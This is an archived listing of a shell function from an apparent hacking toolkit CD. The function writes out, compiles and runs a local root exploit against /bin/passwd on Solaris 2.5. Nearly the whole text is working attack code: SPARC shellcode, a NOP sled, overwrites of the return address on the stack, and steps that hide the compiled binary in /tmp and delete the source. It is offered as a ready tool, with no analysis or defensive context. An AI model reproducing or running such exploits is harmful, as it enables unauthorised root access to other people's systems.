home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / crh / solaris-toolkit / soltool / dopasswd.55 < prev    next >
Encoding:
Text File  |  2002-05-27  |  1.9 KB  |  88 lines

  1. function dopasswd {
  2.  
  3.         if [ -s /tmp/passex.c ]; then
  4.                 /bin/rm /tmp/passex.c
  5.                 dopasswd
  6.         else
  7.  
  8. /bin/cat > /tmp/passex.c << STOP
  9. /*
  10. This is for Solaris 2.5.(1) !
  11. With argv[1] you can modify the stack offset (+-500) if you have troubles
  12. ....
  13. */
  14.  
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <sys/types.h>
  18. #include <unistd.h>
  19.  
  20. #define BUF_LENGTH      1100
  21. #define EXTRA           1200
  22. #define STACK_OFFSET    3800
  23. #define SPARC_NOP       0xa61cc013
  24.  
  25. u_char sparc_shellcode[] =
  26. "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  27. "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  28. "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  29. "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  30. "\x82\x10\x20\x3b\x91\xd4\xff\xff"
  31. ;
  32.  
  33. u_long get_sp(void)
  34. {
  35.   __asm__("mov %sp,%i0 \n");
  36. }
  37.  
  38. void main(int argc, char *argv[])
  39. {
  40.   char buf[BUF_LENGTH + EXTRA];
  41.   long targ_addr;
  42.   u_long *long_p;
  43.   u_char *char_p;
  44.   int i, code_length = strlen(sparc_shellcode),dso=0;
  45.  
  46.   if(argc > 1) dso=atoi(argv[1]);
  47.  
  48.   long_p =(u_long *)  buf;
  49.     targ_addr = get_sp() - STACK_OFFSET - dso;
  50.  
  51.   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  52.     *long_p++ = SPARC_NOP;
  53.  
  54.   char_p = (u_char *) long_p;
  55.  
  56.   for (i = 0; i < code_length; i++)
  57.     *char_p++ = sparc_shellcode[i];
  58.  
  59.   long_p = (u_long *) char_p;
  60.  
  61.  
  62.   for (i = 0; i < EXTRA / sizeof(u_long); i++)
  63.     *long_p++ =targ_addr;
  64.  
  65.   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  66.   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  67.   execl("/bin/passwd", "passwd", buf,(char *) 0);
  68.   perror("execl failed");
  69. }
  70. STOP
  71.  
  72. cc -o /tmp/.passex -O /tmp/passex.c 2> /dev/null
  73. /bin/rm /tmp/passex.c
  74. echo " "
  75.  
  76. if [ -s /tmp/.passex ]; then
  77.         /tmp/.passex
  78.         else
  79.                 echo " oOo Passwd exploit failed."
  80.                 echo " "
  81.         exit 1
  82. fi
  83.  
  84. /bin/rm /tmp/.passex
  85. exit 0
  86. fi
  87. }
  88.